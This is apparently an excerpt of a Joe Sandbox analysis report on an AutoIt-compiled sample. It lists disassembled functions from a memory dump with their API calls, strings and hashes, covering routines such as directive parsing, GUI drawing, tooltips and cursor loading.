Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2901ce9402530f39d5bd07d094e5845321dab60f2477e0b6ad3e338ffa27d16c
Instruction ID: c08ab7a92b171e4d0b1ee5a5be8dec3fefeb7a8be2fd0c6c2c262ab3d52a6b2f
Opcode Fuzzy Hash: 2901ce9402530f39d5bd07d094e5845321dab60f2477e0b6ad3e338ffa27d16c
Instruction Fuzzy Hash: 3E51A3F0648B0DAB9B02EB10CD52EBD73A4EB58700730406BF60BAF691DA75AD41DB57

Function 003968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00396931
__wcsnicmp.LIBCMT ref: 00396949
__wcsnicmp.LIBCMT ref: 00396961
__wcsnicmp.LIBCMT ref: 00396979
__wcsnicmp.LIBCMT ref: 00396991
__wcsnicmp.LIBCMT ref: 003969A9
__wcsnicmp.LIBCMT ref: 003969C1
__wcsnicmp.LIBCMT ref: 003969D5
__wcsnicmp.LIBCMT ref: 00396A16
__wcsnicmp.LIBCMT ref: 00396A2A
__wcsnicmp.LIBCMT ref: 00396A3E
__wcsnicmp.LIBCMT ref: 00396A52

Strings

Bad directive syntax error, xrefs: 003CE31A
Unterminated group of comments, xrefs: 003CE403
#comments-start, xrefs: 003969BB, 00396A10
#include-once, xrefs: 0039698B
#cs, xrefs: 003969CF, 00396A24
#pragma compile, xrefs: 0039692B
#requireadmin, xrefs: 0039695B
#notrayicon, xrefs: 00396943
#comments-end, xrefs: 00396A38
#include, xrefs: 003969A3
#ce, xrefs: 00396A4C
Cannot parse #include, xrefs: 003CE3F0
#OnAutoItStartRegister, xrefs: 00396973

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: cce3626110acd60d8f615f883ff26dddad3b27f740fb44abdd7e456b484e2429
Instruction ID: 36062c1057e35a383538906ab2aea9d9a4525d09dd2286cac966b3a1e8b8db0c
Opcode Fuzzy Hash: cce3626110acd60d8f615f883ff26dddad3b27f740fb44abdd7e456b484e2429
Instruction Fuzzy Hash: E08111B1601215BADF23AA60EC43FAF3768AF05704F140029F905AF592EF61EE85D3A4

Function 00419A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00419AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00419B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00419BA7

Strings

0, xrefs: 00419BE4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 3ba6ce359abcc234e057c4b1bb4cee389fbfbd6205fcecdd2862020c76d0ccbc
Instruction ID: a030ad1de5596b1001a93eba92c25aa7731ea18b93935b5b2c812d82698c4b81
Opcode Fuzzy Hash: 3ba6ce359abcc234e057c4b1bb4cee389fbfbd6205fcecdd2862020c76d0ccbc
Instruction Fuzzy Hash: F5029C30104301ABD715CF14C868BEBBBE5FF49314F04852EF999962A1D738DD96CB9A

Function 0041A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0041A903
SetTextColor.GDI32(?,?), ref: 0041A907
GetSysColorBrush.USER32(0000000F), ref: 0041A91D
GetSysColor.USER32(0000000F), ref: 0041A928
CreateSolidBrush.GDI32(?), ref: 0041A92D
GetSysColor.USER32(00000011), ref: 0041A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041A953
SelectObject.GDI32(?,00000000), ref: 0041A964
SetBkColor.GDI32(?,00000000), ref: 0041A96D
SelectObject.GDI32(?,?), ref: 0041A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0041A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0041A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0041AA32
DrawFocusRect.USER32(?,?), ref: 0041AA3D
GetSysColor.USER32(00000011), ref: 0041AA4B
SetTextColor.GDI32(?,00000000), ref: 0041AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0041AA67
SelectObject.GDI32(?,0041A5FA), ref: 0041AA7E
DeleteObject.GDI32(?), ref: 0041AA89
SelectObject.GDI32(?,?), ref: 0041AA8F
DeleteObject.GDI32(?), ref: 0041AA94
SetTextColor.GDI32(?,?), ref: 0041AA9A
SetBkColor.GDI32(?,?), ref: 0041AAA4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2a0c0717e4d1e42daa46fee76d203ef48b9c7b549ca49778322f90046ca39d62
Instruction ID: b1035bae9078fb9ab81f7b90d507b3c2d91edb182a0aabfcd63f8c7cefd15edb
Opcode Fuzzy Hash: 2a0c0717e4d1e42daa46fee76d203ef48b9c7b549ca49778322f90046ca39d62
Instruction Fuzzy Hash: 3D516C71901208FFDB119FA4DC48EEE7BB9EF08320F218626F915AB2A1D7759941CF94

Function 004189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00418AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00418AD2
CharNextW.USER32(0000014E), ref: 00418B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00418B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00418B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00418B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00418B86
SetWindowTextW.USER32(?,0000014E), ref: 00418BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00418BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00418C1F
_memset.LIBCMT ref: 00418C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00418C8D
_memset.LIBCMT ref: 00418CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00418D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00418D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00418E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00418E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00418E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00418EB4
DrawMenuBar.USER32(?), ref: 00418EC3
SetWindowTextW.USER32(?,0000014E), ref: 00418EEB

Strings

0, xrefs: 00418E55

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1881397de695bd205a6794ef8f86814a251202dcf87995f5d74e44902a480987
Instruction ID: 5d7542bcb4a648d215765058b96b3c65baafa436c6939f167b43e8722ed98c39
Opcode Fuzzy Hash: 1881397de695bd205a6794ef8f86814a251202dcf87995f5d74e44902a480987
Instruction Fuzzy Hash: D3E17070900208ABDF21DF50CC84EEF7B79EF09750F10815BFA15AA291DB789986DF69

Function 0041488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004149CA
GetDesktopWindow.USER32 ref: 004149DF
GetWindowRect.USER32(00000000), ref: 004149E6
GetWindowLongW.USER32(?,000000F0), ref: 00414A48
DestroyWindow.USER32(?), ref: 00414A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00414A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00414ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00414AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00414AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00414B09
IsWindowVisible.USER32(?), ref: 00414B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00414B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00414B58
GetWindowRect.USER32(?,?), ref: 00414B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00414B96
GetMonitorInfoW.USER32(00000000,?), ref: 00414BB0
CopyRect.USER32(?,?), ref: 00414BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00414C32

Strings

tooltips_class32, xrefs: 00414A96
0, xrefs: 00414975
(, xrefs: 00414BA3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f60da2727e4f6a3262da727110d6e36b20b94dcf3b5d983bef99d71f35ba36af
Instruction ID: a95ae149ee890944749919959a62275144201ecf9e01efd841553c09e8b76af8
Opcode Fuzzy Hash: f60da2727e4f6a3262da727110d6e36b20b94dcf3b5d983bef99d71f35ba36af
Instruction Fuzzy Hash: 12B18D71608340AFDB04DF64C845B9BBBE4BF88710F00892EF5999B2A1D775EC46CB59

Function 003F449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 003F44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003F44D2
_wcscpy.LIBCMT ref: 003F4500
_wcscmp.LIBCMT ref: 003F450B
_wcscat.LIBCMT ref: 003F4521
_wcsstr.LIBCMT ref: 003F452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003F4548
_wcscat.LIBCMT ref: 003F4591
_wcscat.LIBCMT ref: 003F4598
_wcsncpy.LIBCMT ref: 003F45C3

Strings

04090000, xrefs: 003F457E
DefaultLangCodepage, xrefs: 003F45AB
StringFileInfo\, xrefs: 003F451B
%u.%u.%u.%u, xrefs: 003F4626
\VarFileInfo\Translation, xrefs: 003F4540

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 4df67c9198b728f44bd389992790e692ad42c3fa9bd0aa2693ed938745cd0f0a
Instruction ID: 6de865fb9063050136d5472f187e86e7fc905916626fa41e378d677cf1ce839a
Opcode Fuzzy Hash: 4df67c9198b728f44bd389992790e692ad42c3fa9bd0aa2693ed938745cd0f0a
Instruction Fuzzy Hash: 144107319002047BEB16BB748C47FFF776CDF42754F10016AFB08EA582EB389A0196A9

Function 003927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003928BC
GetSystemMetrics.USER32(00000007), ref: 003928C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003928EF
GetSystemMetrics.USER32(00000008), ref: 003928F7
GetSystemMetrics.USER32(00000004), ref: 0039291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00392939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00392949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0039297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00392990
GetClientRect.USER32(00000000,000000FF), ref: 003929AE
GetStockObject.GDI32(00000011), ref: 003929CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 003929D5

Part of subcall function 00392344: GetCursorPos.USER32(?), ref: 00392357
Part of subcall function 00392344: ScreenToClient.USER32(004557B0,?), ref: 00392374
Part of subcall function 00392344: GetAsyncKeyState.USER32(00000001), ref: 00392399
Part of subcall function 00392344: GetAsyncKeyState.USER32(00000002), ref: 003923A7

SetTimer.USER32(00000000,00000000,00000028,00391256), ref: 003929FC

Strings

AutoIt v3 GUI, xrefs: 00392974

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 373bcf1977df61a639d94a2e5c8e396a4fd0795113402e0cb7562b87b4c69dd0
Instruction ID: 24a98dfb5cad8db5de39a06699fcad0c75a2e19300f27b928c61fae1671f3d1f
Opcode Fuzzy Hash: 373bcf1977df61a639d94a2e5c8e396a4fd0795113402e0cb7562b87b4c69dd0
Instruction Fuzzy Hash: 9DB17971A0060AEFDF15EFA8CC45BAA7BA5FB08311F118129FA15E62A0DB74E851CB54

Function 003EA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003EA47A
__swprintf.LIBCMT ref: 003EA51B
_wcscmp.LIBCMT ref: 003EA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003EA583
_wcscmp.LIBCMT ref: 003EA5BF
GetClassNameW.USER32(?,?,00000400), ref: 003EA5F6
GetDlgCtrlID.USER32(?), ref: 003EA648
GetWindowRect.USER32(?,?), ref: 003EA67E
GetParent.USER32(?), ref: 003EA69C
ScreenToClient.USER32(00000000), ref: 003EA6A3
GetClassNameW.USER32(?,?,00000100), ref: 003EA71D
_wcscmp.LIBCMT ref: 003EA731
GetWindowTextW.USER32(?,?,00000400), ref: 003EA757
_wcscmp.LIBCMT ref: 003EA76B

Part of subcall function 003B362C: _iswctype.LIBCMT ref: 003B3634

Strings

%s%u, xrefs: 003EA515

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: db2f7960b7a5961d63a146eaa0a1b60b8faf503b8ecae6fafea5aaa73be9a266
Instruction ID: 9568b5a70290760be85d2b6762fa2177ec1a9327d429c2c4903a5347a8cf4276
Opcode Fuzzy Hash: db2f7960b7a5961d63a146eaa0a1b60b8faf503b8ecae6fafea5aaa73be9a266
Instruction Fuzzy Hash: 01A1C331204A66AFD716DF61C884BEAB7E8FF45314F008629F999D61D0DB30F946CB92

Function 003EAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 003EAF18
_wcscmp.LIBCMT ref: 003EAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 003EAF51
CharUpperBuffW.USER32(?,00000000), ref: 003EAF6E
_wcscmp.LIBCMT ref: 003EAF8C
_wcsstr.LIBCMT ref: 003EAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 003EAFD5
_wcscmp.LIBCMT ref: 003EAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 003EB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 003EB055
_wcscmp.LIBCMT ref: 003EB065
GetClassNameW.USER32(00000010,?,00000400), ref: 003EB08D
GetWindowRect.USER32(00000004,?), ref: 003EB0F6

Strings

ThumbnailClass, xrefs: 003EAFE0, 003EB060
@, xrefs: 003EAEF9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 28783b7b4aac80f343af4f2b577401768889db7ae22c97554463e3d3517328c1
Instruction ID: 5b260febb3f0292474e31a1e760276c7efd6d6f3a4a1bf088d3e2b12a768545c
Opcode Fuzzy Hash: 28783b7b4aac80f343af4f2b577401768889db7ae22c97554463e3d3517328c1
Instruction Fuzzy Hash: 2A81BF711082959FDB13DF12C885BABB7D8EF84314F04866AFD858A0D5DB30ED4ACBA1

Function 0041C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

DragQueryPoint.SHELL32(?,?), ref: 0041C627

Part of subcall function 0041AB37: ClientToScreen.USER32(?,?), ref: 0041AB60
Part of subcall function 0041AB37: GetWindowRect.USER32(?,?), ref: 0041ABD6
Part of subcall function 0041AB37: PtInRect.USER32(?,?,0041C014), ref: 0041ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0041C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0041C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0041C6BE
_wcscat.LIBCMT ref: 0041C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0041C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0041C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0041C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0041C757
DragFinish.SHELL32(?), ref: 0041C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0041C851

Strings

pbE, xrefs: 0041C79B
@GUI_DROPID, xrefs: 0041C77E
@GUI_DRAGFILE, xrefs: 0041C800
@GUI_DRAGID, xrefs: 0041C7C9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbE
API String ID: 169749273-2677925638
Opcode ID: 62f6f45f70241b7e8470304ea835d5624f6eca6e2528de2901f550b10166e155
Instruction ID: 263c7b12dacec4bbeeeb7f049a90afd2cf48c6e478c1f99f525adffc6b966122
Opcode Fuzzy Hash: 62f6f45f70241b7e8470304ea835d5624f6eca6e2528de2901f550b10166e155
Instruction Fuzzy Hash: EB619E71108301AFCB01EF64DC85EAFBBE8FF89310F40492EF591961A1DB70A949CB56

Function 003EABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003EAC33

Strings

ACTIVE, xrefs: 003EAC0E
[ALL, xrefs: 003EACD9
LAST, xrefs: 003EABF8
[CLASS:, xrefs: 003EAC83
HANDLE=, xrefs: 003EAC2C
[HANDLE:, xrefs: 003EAC3F
CLASSNAME=, xrefs: 003EAC70
[REGEXPTITLE:, xrefs: 003EAC5B
[LAST, xrefs: 003EACE0
[ACTIVE, xrefs: 003EAC20
REGEXP=, xrefs: 003EAC48
ALL, xrefs: 003EACC7

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 0ca3ccdb4a189f489c14e90ccb79876d7ae2af6ae77869f47d8388c5a7d76e84
Instruction ID: 6fbf4931552be4d5069b28ee65fb0c57fc75d27e1a583c6fc89a8c05b76cac09
Opcode Fuzzy Hash: 0ca3ccdb4a189f489c14e90ccb79876d7ae2af6ae77869f47d8388c5a7d76e84
Instruction Fuzzy Hash: 6731E331A48659ABEA12FB61DD03FFE7764AF10710F30062AF402B94D1EF556F04C696

Function 00404FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00405013
LoadCursorW.USER32(00000000,00007F00), ref: 0040501E
LoadCursorW.USER32(00000000,00007F03), ref: 00405029
LoadCursorW.USER32(00000000,00007F8B), ref: 00405034
LoadCursorW.USER32(00000000,00007F01), ref: 0040503F
LoadCursorW.USER32(00000000,00007F81), ref: 0040504A
LoadCursorW.USER32(00000000,00007F88), ref: 00405055
LoadCursorW.USER32(00000000,00007F80), ref: 00405060
LoadCursorW.USER32(00000000,00007F86), ref: 0040506B
LoadCursorW.USER32(00000000,00007F83), ref: 00405076
LoadCursorW.USER32(00000000,00007F85), ref: 00405081
LoadCursorW.USER32(00000000,00007F82), ref: 0040508C
LoadCursorW.USER32(00000000,00007F84), ref: 00405097
LoadCursorW.USER32(00000000,00007F04), ref: 004050A2
LoadCursorW.USER32(00000000,00007F02), ref: 004050AD
LoadCursorW.USER32(00000000,00007F89), ref: 004050B8
GetCursorInfo.USER32(?), ref: 004050C8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
